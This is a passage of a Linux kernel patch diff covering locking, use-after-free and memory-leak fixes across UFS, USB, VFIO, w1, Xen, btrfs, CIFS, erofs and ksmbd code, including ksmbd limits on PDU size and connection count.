+ 		ufshcd_scsi_unblock_requests(hba);
+ 		goto out;
+ 	}
+@@ -1248,12 +1250,16 @@ out:
+ 	return ret;
+ }
+ 
+-static void ufshcd_clock_scaling_unprepare(struct ufs_hba *hba, bool writelock)
++static void ufshcd_clock_scaling_unprepare(struct ufs_hba *hba, int err, bool scale_up)
+ {
+-	if (writelock)
+-		up_write(&hba->clk_scaling_lock);
+-	else
+-		up_read(&hba->clk_scaling_lock);
++	up_write(&hba->clk_scaling_lock);
++
++	/* Enable Write Booster if we have scaled up else disable it */
++	if (ufshcd_enable_wb_if_scaling_up(hba) && !err)
++		ufshcd_wb_toggle(hba, scale_up);
++
++	mutex_unlock(&hba->wb_mutex);
++
+ 	ufshcd_scsi_unblock_requests(hba);
+ 	ufshcd_release(hba);
+ }
+@@ -1270,7 +1276,6 @@ static void ufshcd_clock_scaling_unprepare(struct ufs_hba *hba, bool writelock)
+ static int ufshcd_devfreq_scale(struct ufs_hba *hba, bool scale_up)
+ {
+ 	int ret = 0;
+-	bool is_writelock = true;
+ 
+ 	ret = ufshcd_clock_scaling_prepare(hba);
+ 	if (ret)
+@@ -1299,15 +1304,8 @@ static int ufshcd_devfreq_scale(struct ufs_hba *hba, bool scale_up)
+ 		}
+ 	}
+ 
+-	/* Enable Write Booster if we have scaled up else disable it */
+-	if (ufshcd_enable_wb_if_scaling_up(hba)) {
+-		downgrade_write(&hba->clk_scaling_lock);
+-		is_writelock = false;
+-		ufshcd_wb_toggle(hba, scale_up);
+-	}
+-
+ out_unprepare:
+-	ufshcd_clock_scaling_unprepare(hba, is_writelock);
++	ufshcd_clock_scaling_unprepare(hba, ret, scale_up);
+ 	return ret;
+ }
+ 
+@@ -6104,9 +6102,11 @@ static void ufshcd_force_error_recovery(struct ufs_hba *hba)
+ 
+ static void ufshcd_clk_scaling_allow(struct ufs_hba *hba, bool allow)
+ {
++	mutex_lock(&hba->wb_mutex);
+ 	down_write(&hba->clk_scaling_lock);
+ 	hba->clk_scaling.is_allowed = allow;
+ 	up_write(&hba->clk_scaling_lock);
++	mutex_unlock(&hba->wb_mutex);
+ }
+ 
+ static void ufshcd_clk_scaling_suspend(struct ufs_hba *hba, bool suspend)
+@@ -9773,6 +9773,7 @@ int ufshcd_init(struct ufs_hba *hba, void __iomem *mmio_base, unsigned int irq)
+ 	/* Initialize mutex for exception event control */
+ 	mutex_init(&hba->ee_ctrl_mutex);
+ 
++	mutex_init(&hba->wb_mutex);
+ 	init_rwsem(&hba->clk_scaling_lock);
+ 
+ 	ufshcd_init_clk_gating(hba);
+diff --git a/drivers/usb/dwc3/Kconfig b/drivers/usb/dwc3/Kconfig
+index 03ededa86da1f..864fef540a394 100644
+--- a/drivers/usb/dwc3/Kconfig
++++ b/drivers/usb/dwc3/Kconfig
+@@ -3,6 +3,7 @@
+ config USB_DWC3
+ 	tristate "DesignWare USB3 DRD Core Support"
+ 	depends on (USB || USB_GADGET) && HAS_DMA
++	depends on (EXTCON || EXTCON=n)
+ 	select USB_XHCI_PLATFORM if USB_XHCI_HCD
+ 	select USB_ROLE_SWITCH if USB_DWC3_DUAL_ROLE
+ 	help
+@@ -44,7 +45,6 @@ config USB_DWC3_GADGET
+ config USB_DWC3_DUAL_ROLE
+ 	bool "Dual Role mode"
+ 	depends on ((USB=y || USB=USB_DWC3) && (USB_GADGET=y || USB_GADGET=USB_DWC3))
+-	depends on (EXTCON=y || EXTCON=USB_DWC3)
+ 	help
+ 	  This is the default mode of working of DWC3 controller where
+ 	  both host and gadget features are enabled.
+diff --git a/drivers/usb/gadget/function/f_fs.c b/drivers/usb/gadget/function/f_fs.c
+index 73dc10a77cdea..523a961b910bb 100644
+--- a/drivers/usb/gadget/function/f_fs.c
++++ b/drivers/usb/gadget/function/f_fs.c
+@@ -279,6 +279,9 @@ static int __ffs_ep0_queue_wait(struct ffs_data *ffs, char *data, size_t len)
+ 	struct usb_request *req = ffs->ep0req;
+ 	int ret;
+ 
++	if (!req)
++		return -EINVAL;
++
+ 	req->zero     = len < le16_to_cpu(ffs->ev.setup.wLength);
+ 
+ 	spin_unlock_irq(&ffs->ev.waitq.lock);
+@@ -1892,10 +1895,14 @@ static void functionfs_unbind(struct ffs_data *ffs)
+ 	ENTER();
+ 
+ 	if (!WARN_ON(!ffs->gadget)) {
++		/* dequeue before freeing ep0req */
++		usb_ep_dequeue(ffs->gadget->ep0, ffs->ep0req);
++		mutex_lock(&ffs->mutex);
+ 		usb_ep_free_request(ffs->gadget->ep0, ffs->ep0req);
+ 		ffs->ep0req = NULL;
+ 		ffs->gadget = NULL;
+ 		clear_bit(FFS_FL_BOUND, &ffs->flags);
++		mutex_unlock(&ffs->mutex);
+ 		ffs_data_put(ffs);
+ 	}
+ }
+diff --git a/drivers/usb/typec/ucsi/ucsi.c b/drivers/usb/typec/ucsi/ucsi.c
+index eabe519013e78..1292241d581a6 100644
+--- a/drivers/usb/typec/ucsi/ucsi.c
++++ b/drivers/usb/typec/ucsi/ucsi.c
+@@ -187,6 +187,7 @@ EXPORT_SYMBOL_GPL(ucsi_send_command);
+ 
+ struct ucsi_work {
+ 	struct delayed_work work;
++	struct list_head node;
+ 	unsigned long delay;
+ 	unsigned int count;
+ 	struct ucsi_connector *con;
+@@ -202,6 +203,7 @@ static void ucsi_poll_worker(struct work_struct *work)
+ 	mutex_lock(&con->lock);
+ 
+ 	if (!con->partner) {
++		list_del(&uwork->node);
+ 		mutex_unlock(&con->lock);
+ 		kfree(uwork);
+ 		return;
+@@ -209,10 +211,12 @@ static void ucsi_poll_worker(struct work_struct *work)
+ 
+ 	ret = uwork->cb(con);
+ 
+-	if (uwork->count-- && (ret == -EBUSY || ret == -ETIMEDOUT))
++	if (uwork->count-- && (ret == -EBUSY || ret == -ETIMEDOUT)) {
+ 		queue_delayed_work(con->wq, &uwork->work, uwork->delay);
+-	else
++	} else {
++		list_del(&uwork->node);
+ 		kfree(uwork);
++	}
+ 
+ 	mutex_unlock(&con->lock);
+ }
+@@ -236,6 +240,7 @@ static int ucsi_partner_task(struct ucsi_connector *con,
+ 	uwork->con = con;
+ 	uwork->cb = cb;
+ 
++	list_add_tail(&uwork->node, &con->partner_tasks);
+ 	queue_delayed_work(con->wq, &uwork->work, delay);
+ 
+ 	return 0;
+@@ -1056,6 +1061,7 @@ static int ucsi_register_port(struct ucsi *ucsi, int index)
+ 	INIT_WORK(&con->work, ucsi_handle_connector_change);
+ 	init_completion(&con->complete);
+ 	mutex_init(&con->lock);
++	INIT_LIST_HEAD(&con->partner_tasks);
+ 	con->num = index + 1;
+ 	con->ucsi = ucsi;
+ 
+@@ -1420,8 +1426,20 @@ void ucsi_unregister(struct ucsi *ucsi)
+ 		ucsi_unregister_altmodes(&ucsi->connector[i],
+ 					 UCSI_RECIPIENT_CON);
+ 		ucsi_unregister_port_psy(&ucsi->connector[i]);
+-		if (ucsi->connector[i].wq)
++
++		if (ucsi->connector[i].wq) {
++			struct ucsi_work *uwork;
++
++			mutex_lock(&ucsi->connector[i].lock);
++			/*
++			 * queue delayed items immediately so they can execute
++			 * and free themselves before the wq is destroyed
++			 */
++			list_for_each_entry(uwork, &ucsi->connector[i].partner_tasks, node)
++				mod_delayed_work(ucsi->connector[i].wq, &uwork->work, 0);
++			mutex_unlock(&ucsi->connector[i].lock);
+ 			destroy_workqueue(ucsi->connector[i].wq);
++		}
+ 		typec_unregister_port(ucsi->connector[i].port);
+ 	}
+ 
+diff --git a/drivers/usb/typec/ucsi/ucsi.h b/drivers/usb/typec/ucsi/ucsi.h
+index c968474ee5473..60ce9fb6e7450 100644
+--- a/drivers/usb/typec/ucsi/ucsi.h
++++ b/drivers/usb/typec/ucsi/ucsi.h
+@@ -322,6 +322,7 @@ struct ucsi_connector {
+ 	struct work_struct work;
+ 	struct completion complete;
+ 	struct workqueue_struct *wq;
++	struct list_head partner_tasks;
+ 
+ 	struct typec_port *port;
+ 	struct typec_partner *partner;
+diff --git a/drivers/vfio/vfio_iommu_type1.c b/drivers/vfio/vfio_iommu_type1.c
+index 23c24fe98c00d..2209372f236db 100644
+--- a/drivers/vfio/vfio_iommu_type1.c
++++ b/drivers/vfio/vfio_iommu_type1.c
+@@ -1856,24 +1856,33 @@ unwind:
+  * significantly boosts non-hugetlbfs mappings and doesn't seem to hurt when
+  * hugetlbfs is in use.
+  */
+-static void vfio_test_domain_fgsp(struct vfio_domain *domain)
++static void vfio_test_domain_fgsp(struct vfio_domain *domain, struct list_head *regions)
+ {
+-	struct page *pages;
+ 	int ret, order = get_order(PAGE_SIZE * 2);
++	struct vfio_iova *region;
++	struct page *pages;
++	dma_addr_t start;
+ 
+ 	pages = alloc_pages(GFP_KERNEL | __GFP_ZERO, order);
+ 	if (!pages)
+ 		return;
+ 
+-	ret = iommu_map(domain->domain, 0, page_to_phys(pages), PAGE_SIZE * 2,
+-			IOMMU_READ | IOMMU_WRITE | IOMMU_CACHE);
+-	if (!ret) {
+-		size_t unmapped = iommu_unmap(domain->domain, 0, PAGE_SIZE);
++	list_for_each_entry(region, regions, list) {
++		start = ALIGN(region->start, PAGE_SIZE * 2);
++		if (start >= region->end || (region->end - start < PAGE_SIZE * 2))
++			continue;
+ 
+-		if (unmapped == PAGE_SIZE)
+-			iommu_unmap(domain->domain, PAGE_SIZE, PAGE_SIZE);
+-		else
+-			domain->fgsp = true;
++		ret = iommu_map(domain->domain, start, page_to_phys(pages), PAGE_SIZE * 2,
++				IOMMU_READ | IOMMU_WRITE | IOMMU_CACHE);
++		if (!ret) {
++			size_t unmapped = iommu_unmap(domain->domain, start, PAGE_SIZE);
++
++			if (unmapped == PAGE_SIZE)
++				iommu_unmap(domain->domain, start + PAGE_SIZE, PAGE_SIZE);
++			else
++				domain->fgsp = true;
++		}
++		break;
+ 	}
+ 
+ 	__free_pages(pages, order);
+@@ -2326,7 +2335,7 @@ static int vfio_iommu_type1_attach_group(void *iommu_data,
+ 		}
+ 	}
+ 
+-	vfio_test_domain_fgsp(domain);
++	vfio_test_domain_fgsp(domain, &iova_copy);
+ 
+ 	/* replay mappings on new domains */
+ 	ret = vfio_iommu_replay(iommu, domain);
+diff --git a/drivers/w1/w1.c b/drivers/w1/w1.c
+index f2ae2e563dc54..4a2ddf730a3ac 100644
+--- a/drivers/w1/w1.c
++++ b/drivers/w1/w1.c
+@@ -1166,6 +1166,8 @@ int w1_process(void *data)
+ 	/* remainder if it woke up early */
+ 	unsigned long jremain = 0;
+ 
++	atomic_inc(&dev->refcnt);
++
+ 	for (;;) {
+ 
+ 		if (!jremain && dev->search_count) {
+@@ -1193,8 +1195,10 @@ int w1_process(void *data)
+ 		 */
+ 		mutex_unlock(&dev->list_mutex);
+ 
+-		if (kthread_should_stop())
++		if (kthread_should_stop()) {
++			__set_current_state(TASK_RUNNING);
+ 			break;
++		}
+ 
+ 		/* Only sleep when the search is active. */
+ 		if (dev->search_count) {
+diff --git a/drivers/w1/w1_int.c b/drivers/w1/w1_int.c
+index b3e1792d9c49f..3a71c5eb2f837 100644
+--- a/drivers/w1/w1_int.c
++++ b/drivers/w1/w1_int.c
+@@ -51,10 +51,9 @@ static struct w1_master *w1_alloc_dev(u32 id, int slave_count, int slave_ttl,
+ 	dev->search_count	= w1_search_count;
+ 	dev->enable_pullup	= w1_enable_pullup;
+ 
+-	/* 1 for w1_process to decrement
+-	 * 1 for __w1_remove_master_device to decrement
++	/* For __w1_remove_master_device to decrement
+ 	 */
+-	atomic_set(&dev->refcnt, 2);
++	atomic_set(&dev->refcnt, 1);
+ 
+ 	INIT_LIST_HEAD(&dev->slist);
+ 	INIT_LIST_HEAD(&dev->async_list);
+diff --git a/drivers/xen/pvcalls-front.c b/drivers/xen/pvcalls-front.c
+index 1826e8e671251..9b569278788a4 100644
+--- a/drivers/xen/pvcalls-front.c
++++ b/drivers/xen/pvcalls-front.c
+@@ -225,6 +225,8 @@ again:
+ 	return IRQ_HANDLED;
+ }
+ 
++static void free_active_ring(struct sock_mapping *map);
++
+ static void pvcalls_front_free_map(struct pvcalls_bedata *bedata,
+ 				   struct sock_mapping *map)
+ {
+@@ -240,7 +242,7 @@ static void pvcalls_front_free_map(struct pvcalls_bedata *bedata,
+ 	for (i = 0; i < (1 << PVCALLS_RING_ORDER); i++)
+ 		gnttab_end_foreign_access(map->active.ring->ref[i], NULL);
+ 	gnttab_end_foreign_access(map->active.ref, NULL);
+-	free_page((unsigned long)map->active.ring);
++	free_active_ring(map);
+ 
+ 	kfree(map);
+ }
+diff --git a/fs/affs/file.c b/fs/affs/file.c
+index cefa222f7881c..8daeed31e1af9 100644
+--- a/fs/affs/file.c
++++ b/fs/affs/file.c
+@@ -880,7 +880,7 @@ affs_truncate(struct inode *inode)
+ 	if (inode->i_size > AFFS_I(inode)->mmu_private) {
+ 		struct address_space *mapping = inode->i_mapping;
+ 		struct page *page;
+-		void *fsdata;
++		void *fsdata = NULL;
+ 		loff_t isize = inode->i_size;
+ 		int res;
+ 
+diff --git a/fs/btrfs/ctree.h b/fs/btrfs/ctree.h
+index 9e6d48ff45972..a3febabacec04 100644
+--- a/fs/btrfs/ctree.h
++++ b/fs/btrfs/ctree.h
+@@ -590,6 +590,12 @@ enum {
+ 	/* Indicate we have to finish a zone to do next allocation. */
+ 	BTRFS_FS_NEED_ZONE_FINISH,
+ 
++	/*
++	 * Indicate metadata over-commit is disabled. This is set when active
++	 * zone tracking is needed.
++	 */
++	BTRFS_FS_NO_OVERCOMMIT,
++
+ #if BITS_PER_LONG == 32
+ 	/* Indicate if we have error/warn message printed on 32bit systems */
+ 	BTRFS_FS_32BIT_ERROR,
+diff --git a/fs/btrfs/space-info.c b/fs/btrfs/space-info.c
+index f171bf8756336..65c010159fb5f 100644
+--- a/fs/btrfs/space-info.c
++++ b/fs/btrfs/space-info.c
+@@ -404,7 +404,8 @@ int btrfs_can_overcommit(struct btrfs_fs_info *fs_info,
+ 		return 0;
+ 
+ 	used = btrfs_space_info_used(space_info, true);
+-	if (btrfs_is_zoned(fs_info) && (space_info->flags & BTRFS_BLOCK_GROUP_METADATA))
++	if (test_bit(BTRFS_FS_NO_OVERCOMMIT, &fs_info->flags) &&
++	    (space_info->flags & BTRFS_BLOCK_GROUP_METADATA))
+ 		avail = 0;
+ 	else
+ 		avail = calc_available_free_space(fs_info, space_info, flush);
+diff --git a/fs/btrfs/zoned.c b/fs/btrfs/zoned.c
+index c9e2b0c853099..056f002263db5 100644
+--- a/fs/btrfs/zoned.c
++++ b/fs/btrfs/zoned.c
+@@ -538,6 +538,8 @@ int btrfs_get_dev_zone_info(struct btrfs_device *device, bool populate_cache)
+ 		}
+ 		atomic_set(&zone_info->active_zones_left,
+ 			   max_active_zones - nactive);
++		/* Overcommit does not work well with active zone tacking. */
++		set_bit(BTRFS_FS_NO_OVERCOMMIT, &fs_info->flags);
+ 	}
+ 
+ 	/* Validate superblock log */
+diff --git a/fs/cifs/cifsencrypt.c b/fs/cifs/cifsencrypt.c
+index 5db73c0f792a5..cbc18b4a9cb20 100644
+--- a/fs/cifs/cifsencrypt.c
++++ b/fs/cifs/cifsencrypt.c
+@@ -278,6 +278,7 @@ build_avpair_blob(struct cifs_ses *ses, const struct nls_table *nls_cp)
+ 	 * ( for NTLMSSP_AV_NB_DOMAIN_NAME followed by NTLMSSP_AV_EOL ) +
+ 	 * unicode length of a netbios domain name
+ 	 */
++	kfree_sensitive(ses->auth_key.response);
+ 	ses->auth_key.len = size + 2 * dlen;
+ 	ses->auth_key.response = kzalloc(ses->auth_key.len, GFP_KERNEL);
+ 	if (!ses->auth_key.response) {
+diff --git a/fs/cifs/dfs_cache.c b/fs/cifs/dfs_cache.c
+index e70915ad75410..4302dc75843cb 100644
+--- a/fs/cifs/dfs_cache.c
++++ b/fs/cifs/dfs_cache.c
+@@ -792,26 +792,27 @@ static int get_dfs_referral(const unsigned int xid, struct cifs_ses *ses, const
+  */
+ static int cache_refresh_path(const unsigned int xid, struct cifs_ses *ses, const char *path)
+ {
+-	int rc;
+-	struct cache_entry *ce;
+ 	struct dfs_info3_param *refs = NULL;
++	struct cache_entry *ce;
+ 	int numrefs = 0;
+-	bool newent = false;
++	int rc;
+ 
+ 	cifs_dbg(FYI, "%s: search path: %s\n", __func__, path);
+ 
+-	down_write(&htable_rw_lock);
++	down_read(&htable_rw_lock);
+ 
+ 	ce = lookup_cache_entry(path);
+-	if (!IS_ERR(ce)) {
+-		if (!cache_entry_expired(ce)) {
+-			dump_ce(ce);
+-			up_write(&htable_rw_lock);
+-			return 0;
+-		}
+-	} else {
+-		newent = true;
++	if (!IS_ERR(ce) && !cache_entry_expired(ce)) {
++		up_read(&htable_rw_lock);
++		return 0;
+ 	}
++	/*
++	 * Unlock shared access as we don't want to hold any locks while getting
++	 * a new referral.  The @ses used for performing the I/O could be
++	 * reconnecting and it acquires @htable_rw_lock to look up the dfs cache
++	 * in order to failover -- if necessary.
++	 */
++	up_read(&htable_rw_lock);
+ 
+ 	/*
+ 	 * Either the entry was not found, or it is expired.
+@@ -819,19 +820,22 @@ static int cache_refresh_path(const unsigned int xid, struct cifs_ses *ses, cons
+ 	 */
+ 	rc = get_dfs_referral(xid, ses, path, &refs, &numrefs);
+ 	if (rc)
+-		goto out_unlock;
++		goto out;
+ 
+ 	dump_refs(refs, numrefs);
+ 
+-	if (!newent) {
+-		rc = update_cache_entry_locked(ce, refs, numrefs);
+-		goto out_unlock;
++	down_write(&htable_rw_lock);
++	/* Re-check as another task might have it added or refreshed already */
++	ce = lookup_cache_entry(path);
++	if (!IS_ERR(ce)) {
++		if (cache_entry_expired(ce))
++			rc = update_cache_entry_locked(ce, refs, numrefs);
++	} else {
++		rc = add_cache_entry_locked(refs, numrefs);
+ 	}
+ 
+-	rc = add_cache_entry_locked(refs, numrefs);
+-
+-out_unlock:
+ 	up_write(&htable_rw_lock);
++out:
+ 	free_dfs_info_array(refs, numrefs);
+ 	return rc;
+ }
+diff --git a/fs/cifs/sess.c b/fs/cifs/sess.c
+index 0b842a07e1579..c47b254f0d1e2 100644
+--- a/fs/cifs/sess.c
++++ b/fs/cifs/sess.c
+@@ -815,6 +815,7 @@ int decode_ntlmssp_challenge(char *bcc_ptr, int blob_len,
+ 		return -EINVAL;
+ 	}
+ 	if (tilen) {
++		kfree_sensitive(ses->auth_key.response);
+ 		ses->auth_key.response = kmemdup(bcc_ptr + tioffset, tilen,
+ 						 GFP_KERNEL);
+ 		if (!ses->auth_key.response) {
+@@ -1428,6 +1429,7 @@ sess_auth_kerberos(struct sess_data *sess_data)
+ 		goto out_put_spnego_key;
+ 	}
+ 
++	kfree_sensitive(ses->auth_key.response);
+ 	ses->auth_key.response = kmemdup(msg->data, msg->sesskey_len,
+ 					 GFP_KERNEL);
+ 	if (!ses->auth_key.response) {
+diff --git a/fs/cifs/smb2pdu.c b/fs/cifs/smb2pdu.c
+index 92f39052d3117..2c9ffa921e6f6 100644
+--- a/fs/cifs/smb2pdu.c
++++ b/fs/cifs/smb2pdu.c
+@@ -1453,6 +1453,7 @@ SMB2_auth_kerberos(struct SMB2_sess_data *sess_data)
+ 
+ 	/* keep session key if binding */
+ 	if (!is_binding) {
++		kfree_sensitive(ses->auth_key.response);
+ 		ses->auth_key.response = kmemdup(msg->data, msg->sesskey_len,
+ 						 GFP_KERNEL);
+ 		if (!ses->auth_key.response) {
+diff --git a/fs/cifs/smbdirect.c b/fs/cifs/smbdirect.c
+index 90789aaa6567e..8c816b25ce7c6 100644
+--- a/fs/cifs/smbdirect.c
++++ b/fs/cifs/smbdirect.c
+@@ -1405,6 +1405,7 @@ void smbd_destroy(struct TCP_Server_Info *server)
+ 	destroy_workqueue(info->workqueue);
+ 	log_rdma_event(INFO,  "rdma session destroyed\n");
+ 	kfree(info);
++	server->smbd_conn = NULL;
+ }
+ 
+ /*
+diff --git a/fs/erofs/zdata.c b/fs/erofs/zdata.c
+index cf4871834ebb2..ee7c88c9b5afa 100644
+--- a/fs/erofs/zdata.c
++++ b/fs/erofs/zdata.c
+@@ -1047,12 +1047,12 @@ static int z_erofs_decompress_pcluster(struct z_erofs_decompress_backend *be,
+ 
+ 	if (!be->decompressed_pages)
+ 		be->decompressed_pages =
+-			kvcalloc(be->nr_pages, sizeof(struct page *),
+-				 GFP_KERNEL | __GFP_NOFAIL);
++			kcalloc(be->nr_pages, sizeof(struct page *),
++				GFP_KERNEL | __GFP_NOFAIL);
+ 	if (!be->compressed_pages)
+ 		be->compressed_pages =
+-			kvcalloc(pclusterpages, sizeof(struct page *),
+-				 GFP_KERNEL | __GFP_NOFAIL);
++			kcalloc(pclusterpages, sizeof(struct page *),
++				GFP_KERNEL | __GFP_NOFAIL);
+ 
+ 	z_erofs_parse_out_bvecs(be);
+ 	err2 = z_erofs_parse_in_bvecs(be, &overlapped);
+@@ -1100,7 +1100,7 @@ out:
+ 	}
+ 	if (be->compressed_pages < be->onstack_pages ||
+ 	    be->compressed_pages >= be->onstack_pages + Z_EROFS_ONSTACK_PAGES)
+-		kvfree(be->compressed_pages);
++		kfree(be->compressed_pages);
+ 	z_erofs_fill_other_copies(be, err);
+ 
+ 	for (i = 0; i < be->nr_pages; ++i) {
+@@ -1119,7 +1119,7 @@ out:
+ 	}
+ 
+ 	if (be->decompressed_pages != be->onstack_pages)
+-		kvfree(be->decompressed_pages);
++		kfree(be->decompressed_pages);
+ 
+ 	pcl->length = 0;
+ 	pcl->partial = true;
+diff --git a/fs/ksmbd/connection.c b/fs/ksmbd/connection.c
+index fd0a288af299e..56be077e5d8ac 100644
+--- a/fs/ksmbd/connection.c
++++ b/fs/ksmbd/connection.c
+@@ -280,7 +280,7 @@ int ksmbd_conn_handler_loop(void *p)
+ {
+ 	struct ksmbd_conn *conn = (struct ksmbd_conn *)p;
+ 	struct ksmbd_transport *t = conn->transport;
+-	unsigned int pdu_size;
++	unsigned int pdu_size, max_allowed_pdu_size;
+ 	char hdr_buf[4] = {0,};
+ 	int size;
+ 
+@@ -305,13 +305,26 @@ int ksmbd_conn_handler_loop(void *p)
+ 		pdu_size = get_rfc1002_len(hdr_buf);
+ 		ksmbd_debug(CONN, "RFC1002 header %u bytes\n", pdu_size);
+ 
++		if (conn->status == KSMBD_SESS_GOOD)
++			max_allowed_pdu_size =
++				SMB3_MAX_MSGSIZE + conn->vals->max_write_size;
++		else
++			max_allowed_pdu_size = SMB3_MAX_MSGSIZE;
++
++		if (pdu_size > max_allowed_pdu_size) {
++			pr_err_ratelimited("PDU length(%u) excceed maximum allowed pdu size(%u) on connection(%d)\n",
++					pdu_size, max_allowed_pdu_size,
++					conn->status);
++			break;
++		}
++
+ 		/*
+ 		 * Check if pdu size is valid (min : smb header size,
+ 		 * max : 0x00FFFFFF).
+ 		 */
+ 		if (pdu_size < __SMB2_HEADER_STRUCTURE_SIZE ||
+ 		    pdu_size > MAX_STREAM_PROT_LEN) {
+-			continue;
++			break;
+ 		}
+ 
+ 		/* 4 for rfc1002 length field */
+diff --git a/fs/ksmbd/ksmbd_netlink.h b/fs/ksmbd/ksmbd_netlink.h
+index ff07c67f4565e..ce866ff159bfe 100644
+--- a/fs/ksmbd/ksmbd_netlink.h
++++ b/fs/ksmbd/ksmbd_netlink.h
+@@ -105,7 +105,8 @@ struct ksmbd_startup_request {
+ 	__u32	sub_auth[3];		/* Subauth value for Security ID */
+ 	__u32	smb2_max_credits;	/* MAX credits */
+ 	__u32	smbd_max_io_size;	/* smbd read write size */
+-	__u32	reserved[127];		/* Reserved room */
++	__u32	max_connections;	/* Number of maximum simultaneous connections */
++	__u32	reserved[126];		/* Reserved room */
+ 	__u32	ifc_list_sz;		/* interfaces list size */
+ 	__s8	____payload[];
+ };
+diff --git a/fs/ksmbd/ndr.c b/fs/ksmbd/ndr.c
+index 0ae8d08d85a87..4d9e0b54e3dbf 100644
+--- a/fs/ksmbd/ndr.c
++++ b/fs/ksmbd/ndr.c
+@@ -242,7 +242,7 @@ int ndr_decode_dos_attr(struct ndr *n, struct xattr_dos_attrib *da)
+ 		return ret;
+ 
+ 	if (da->version != 3 && da->version != 4) {
+-		pr_err("v%d version is not supported\n", da->version);
++		ksmbd_debug(VFS, "v%d version is not supported\n", da->version);
+ 		return -EINVAL;
+ 	}
+ 
+@@ -251,7 +251,7 @@ int ndr_decode_dos_attr(struct ndr *n, struct xattr_dos_attrib *da)
+ 		return ret;
+ 
+ 	if (da->version != version2) {
+-		pr_err("ndr version mismatched(version: %d, version2: %d)\n",
++		ksmbd_debug(VFS, "ndr version mismatched(version: %d, version2: %d)\n",
+ 		       da->version, version2);
+ 		return -EINVAL;
+ 	}
+@@ -457,7 +457,7 @@ int ndr_decode_v4_ntacl(struct ndr *n, struct xattr_ntacl *acl)
+ 	if (ret)
+ 		return ret;
+ 	if (acl->version != 4) {
+-		pr_err("v%d version is not supported\n", acl->version);
++		ksmbd_debug(VFS, "v%d version is not supported\n", acl->version);
+ 		return -EINVAL;
+ 	}
+ 
+@@ -465,7 +465,7 @@ int ndr_decode_v4_ntacl(struct ndr *n, struct xattr_ntacl *acl)
+ 	if (ret)
+ 		return ret;
+ 	if (acl->version != version2) {
+-		pr_err("ndr version mismatched(version: %d, version2: %d)\n",
++		ksmbd_debug(VFS, "ndr version mismatched(version: %d, version2: %d)\n",
+ 		       acl->version, version2);
+ 		return -EINVAL;
+ 	}
+diff --git a/fs/ksmbd/server.h b/fs/ksmbd/server.h
+index ac9d932f8c8aa..db72781817603 100644
+--- a/fs/ksmbd/server.h
++++ b/fs/ksmbd/server.h
+@@ -41,6 +41,7 @@ struct ksmbd_server_config {
+ 	unsigned int		share_fake_fscaps;
+ 	struct smb_sid		domain_sid;
+ 	unsigned int		auth_mechs;
++	unsigned int		max_connections;
+ 
+ 	char			*conf[SERVER_CONF_WORK_GROUP + 1];
+ };
+diff --git a/fs/ksmbd/smb2pdu.c b/fs/ksmbd/smb2pdu.c
+index 533742ebcb379..9b16ee657b51a 100644
+--- a/fs/ksmbd/smb2pdu.c
++++ b/fs/ksmbd/smb2pdu.c
+@@ -8657,6 +8657,7 @@ int smb3_decrypt_req(struct ksmbd_work *work)
+ bool smb3_11_final_sess_setup_resp(struct ksmbd_work *work)
+ {
+ 	struct ksmbd_conn *conn = work->conn;
++	struct ksmbd_session *sess = work->sess;
+ 	struct smb2_hdr *rsp = smb2_get_msg(work->response_buf);
+ 
+ 	if (conn->dialect < SMB30_PROT_ID)
+@@ -8666,6 +8667,7 @@ bool smb3_11_final_sess_setup_resp(struct ksmbd_work *work)
+ 		rsp = ksmbd_resp_buf_next(work);
+ 
+ 	if (le16_to_cpu(rsp->Command) == SMB2_SESSION_SETUP_HE &&
++	    sess->user && !user_guest(sess->user) &&
+ 	    rsp->Status == STATUS_SUCCESS)
+ 		return true;
+ 	return false;
+diff --git a/fs/ksmbd/smb2pdu.h b/fs/ksmbd/smb2pdu.h
+index 092fdd3f87505..f4baa9800f6ee 100644
+--- a/fs/ksmbd/smb2pdu.h
++++ b/fs/ksmbd/smb2pdu.h
+@@ -24,8 +24,9 @@
+ 
+ #define SMB21_DEFAULT_IOSIZE	(1024 * 1024)
+ #define SMB3_DEFAULT_TRANS_SIZE	(1024 * 1024)
+-#define SMB3_MIN_IOSIZE	(64 * 1024)
+-#define SMB3_MAX_IOSIZE	(8 * 1024 * 1024)
++#define SMB3_MIN_IOSIZE		(64 * 1024)
++#define SMB3_MAX_IOSIZE		(8 * 1024 * 1024)
++#define SMB3_MAX_MSGSIZE	(4 * 4096)
+ 
+ /*
+  *	Definitions for SMB2 Protocol Data Units (network frames)
+diff --git a/fs/ksmbd/transport_ipc.c b/fs/ksmbd/transport_ipc.c
+index c9aca21637d5b..40c721f9227e4 100644
+--- a/fs/ksmbd/transport_ipc.c
++++ b/fs/ksmbd/transport_ipc.c
+@@ -308,6 +308,9 @@ static int ipc_server_config_on_startup(struct ksmbd_startup_request *req)
+ 	if (req->smbd_max_io_size)
+ 		init_smbd_max_io_size(req->smbd_max_io_size);
+ 
++	if (req->max_connections)
++		server_conf.max_connections = req->max_connections;
++
+ 	ret = ksmbd_set_netbios_name(req->netbios_name);
+ 	ret |= ksmbd_set_server_string(req->server_string);
+ 	ret |= ksmbd_set_work_group(req->work_group);
+diff --git a/fs/ksmbd/transport_tcp.c b/fs/ksmbd/transport_tcp.c
+index 4c6bd0b699791..603893fd87f57 100644
+--- a/fs/ksmbd/transport_tcp.c
++++ b/fs/ksmbd/transport_tcp.c
+@@ -15,6 +15,8 @@
+ #define IFACE_STATE_DOWN		BIT(0)
+ #define IFACE_STATE_CONFIGURED		BIT(1)
+ 
++static atomic_t active_num_conn;
++
+ struct interface {
+ 	struct task_struct	*ksmbd_kthread;
+ 	struct socket		*ksmbd_socket;
+@@ -185,8 +187,10 @@ static int ksmbd_tcp_new_connection(struct socket *client_sk)
+ 	struct tcp_transport *t;
+ 
+ 	t = alloc_transport(client_sk);
+-	if (!t)
++	if (!t) {
++		sock_release(client_sk);
+ 		return -ENOMEM;
++	}
+ 
+ 	csin = KSMBD_TCP_PEER_SOCKADDR(KSMBD_TRANS(t)->conn);
+ 	if (kernel_getpeername(client_sk, csin) < 0) {
+@@ -239,6 +243,15 @@ static int ksmbd_kthread_fn(void *p)
+ 			continue;
+ 		}
+ 
++		if (server_conf.max_connections &&
++		    atomic_inc_return(&active_num_conn) >= server_conf.max_connections) {
++			pr_info_ratelimited("Limit the maximum number of connections(%u)\n",
++					    atomic_read(&active_num_conn));
++			atomic_dec(&active_num_conn);
++			sock_release(client_sk);
++			continue;
++		}
++
+ 		ksmbd_debug(CONN, "connect success: accepted new connection\n");
+ 		client_sk->sk->sk_rcvtimeo = KSMBD_TCP_RECV_TIMEOUT;
